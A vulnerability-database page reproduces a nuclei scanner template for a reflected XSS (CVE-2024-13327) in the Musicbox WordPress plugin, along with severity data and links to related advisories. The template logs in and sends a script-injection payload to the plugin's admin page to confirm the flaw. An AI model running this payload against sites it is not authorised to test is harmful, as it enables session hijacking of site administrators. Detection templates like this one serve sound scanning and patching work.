Lucene search
K

Musicbox WordPress - Reflected XSS

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Musicbox WordPress plugin has a reflected XSS in unsanitized parameter output; fix by updating.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13327
4 Feb 202506:16
circl
CNNVD
WordPress plugin Musicbox 安全漏洞
4 Feb 202500:00
cnnvd
CVE
CVE-2024-13327
4 Feb 202506:00
cve
Cvelist
CVE-2024-13327 Musicbox <= 2.0.3 - Reflected XSS
4 Feb 202506:00
cvelist
EUVD
EUVD-2024-51532
3 Oct 202520:07
euvd
NVD
CVE-2024-13327
4 Feb 202506:15
nvd
OSV
CVE-2024-13327
4 Feb 202506:15
osv
Patchstack
WordPress Musicbox plugin <= 2.0.3 - Reflected XSS vulnerability
4 Feb 202522:21
patchstack
Positive Technologies
PT-2025-2113
4 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13327
8 Feb 202504:34
redhatcve
Rows per page
id: CVE-2024-13327

info:
  name: Musicbox WordPress - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13327
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13327
    cwe-id: CWE-79
    epss-score: 0.00567
    epss-percentile: 0.42915
    cpe: cpe:2.3:a:webdesignby:musicbox:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.component:"WordPress"
    fofa-query: body="webdesignby-musicbox"
  tags: cve,cve2024,wordpress,wp,wp-plugin,musicbox,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=webdesignby-musicbox&webdesignby-musicbox-filter=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","musicbox")
        condition: and
# digest: 490a00463044022031609c2bc3220f36d0913dfa33dea25cc7625a0242a3e1978b2af2242dadf6d702201160c991490fcf2878f0111481e07a8a624ffca91eadcd64302d733f3dc4c7b8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:18Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00567
SSVC
13